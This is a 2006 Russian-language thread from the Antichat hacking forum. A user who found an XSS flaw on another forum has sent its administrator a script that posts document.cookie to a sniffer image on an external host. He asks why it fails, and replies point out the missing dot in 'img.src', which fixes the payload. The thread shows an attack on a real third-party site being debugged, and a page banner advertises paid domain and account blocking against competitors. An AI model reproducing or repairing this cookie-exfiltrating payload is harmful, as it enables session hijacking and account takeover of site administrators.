Вопрос по организации XSS атаки, на уязвимом форуме..

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Вопрос по организации XSS атаки, на уязвимом форуме..

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос по организации XSS атаки, на уязвимом форуме..

09.07.2006, 10:09

a1nt

Участник форума

Регистрация: 16.12.2005

Сообщений: 146

С нами: 10736573

Репутация: 114

Вопрос по организации XSS атаки, на уязвимом форуме..

Нашел уязвимый форум, где можно вставить

Код:

<script></script>

. Чтобы забрать cookies админа отправил ему сообщение

Код:

<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>

Где картинк - сниффер на antichat.org. Но когда я написал этот код в html и открыл браузером - моя загрузка в лог добавлена не была, только когда напрямую обращаюсь к http://antichat.org/s/a1nt.gif, мой IP добавляется. В чем же все-таки проблема и стоит ли мне ждать админских cookies?

𝕏 Twitter Reddit Telegram Копировать ссылку

09.07.2006, 11:49

Azazel

Заведующий всем

Регистрация: 17.04.2005

Сообщений: 1,062

С нами: 11087066

Репутация: 561

Посмотри что у тебя в сорсе сообщения. Может фильтруются символы какие-нибудь.

__________________
Full DNS report

09.07.2006, 19:40

a1nt

Участник форума

Регистрация: 16.12.2005

Сообщений: 146

С нами: 10736573

Репутация: 114

В том то и дело, что уязвимость проверенная. Я не понимаю почему конструкция

Код:

<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>

Не работает на моем компьютере.

09.07.2006, 20:07

FQziT

Постоянный

Регистрация: 03.11.2005

Сообщений: 591

С нами: 10798886

Репутация: 523

Цитата:

Цитата:

Найди отличие

09.07.2006, 20:19

Dracula4ever

Постоянный

Регистрация: 08.05.2006

Сообщений: 559

С нами: 10531106

Репутация: 354

Отправить сообщение для Dracula4ever с помощью AIM

Отправить сообщение для Dracula4ever с помощью Yahoo

Цитата:

Сообщение от FQziT

Найди отличие

я помогу.

Цитата:

Цитата:

09.07.2006, 20:21

D1mOn

Постоянный

Регистрация: 02.10.2005

Сообщений: 490

С нами: 10845026

Репутация: 212

Цитата:

точку забыл!

09.07.2006, 20:29

podkashey

Познавший АНТИЧАТ

Регистрация: 18.06.2005

Сообщений: 1,004

С нами: 10997666

Репутация: 1320

a1nt, это приватная инфа - в паблике нету...

09.07.2006, 20:34

FQziT

Постоянный

Регистрация: 03.11.2005

Сообщений: 591

С нами: 10798886

Репутация: 523

dracula4ever, D1mOn: Пять за сообразительность :-)

09.07.2006, 20:58

a1nt

Участник форума

Регистрация: 16.12.2005

Сообщений: 146

С нами: 10736573

Репутация: 114

Епс!! Надо ж так... Ухххх..... Спасибо что ткнули носом, извините за ламеризм.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Вопрос по применению XSS на форуме ExBB 1.9.1	TweakeR	Уязвимости CMS / форумов	9	28.02.2006 18:24
Вопрос про проведению атаки класса XSS, в форуме Invison Power Board	badboy	Уязвимости CMS / форумов	10	02.06.2005 22:28

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход